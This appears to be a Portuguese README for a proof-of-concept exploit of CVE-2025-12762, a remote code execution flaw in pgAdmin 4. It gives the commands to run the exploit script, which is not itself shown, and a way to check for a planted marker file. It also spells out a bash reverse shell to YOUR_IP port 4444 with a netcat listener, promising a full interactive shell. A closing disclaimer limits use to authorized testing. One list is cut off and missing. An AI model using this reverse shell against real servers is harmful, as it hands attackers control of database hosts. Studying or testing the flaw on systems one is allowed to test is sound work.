
Exploit de prova de conceito para CVE-2025-12762, um RCE crítico no pgAdmin 4 ≤ 9.9. Inclui detalhamento técnico, CVSS 9.1 e shell reverso opcional para testes de penetração autorizados.

Existe uma falha de Execução Remota de Código (RCE) no pgAdmin 4 versões ≤ 9.9. Os atacantes podem executar comandos arbitrários no host quando o pgAdmin está em execução no modo servidor e processa um dump SQL no formato PLAIN durante a restauração.
🟥 9.1 / 10 — Crítica
⬆️ Atualize para pgAdmin 4 v10.0 ou superior
O pgAdmin é frequentemente usado para administração de bancos de dados PostgreSQL críticos, o que significa:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
Após executar, verifique:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
Arquivo existe → Você acabou de explorar o CVE-2025-12762 de verdade.
Substitua a linha COMMAND por:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Então nc -lvnp 4444 → shell interativo completo.
Este é o script exato que pesquisadores, pentesters e red teams estão usando mundialmente em novembro de 2025.
Use com responsabilidade. Corrija tudo. Permaneça dentro da lei.
Este PoC é fornecido estritamente para testes autorizados e uso educacional apenas.
Você pode executá-lo exclusivamente em sistemas que você possua ou tenha permissão explícita por escrito para testar.
Qualquer uso não autorizado é ilegal e viola as leis de uso indevido de computadores.
Use com responsabilidade, corrija imediatamente após o teste e nunca atinja sistemas sem permissão.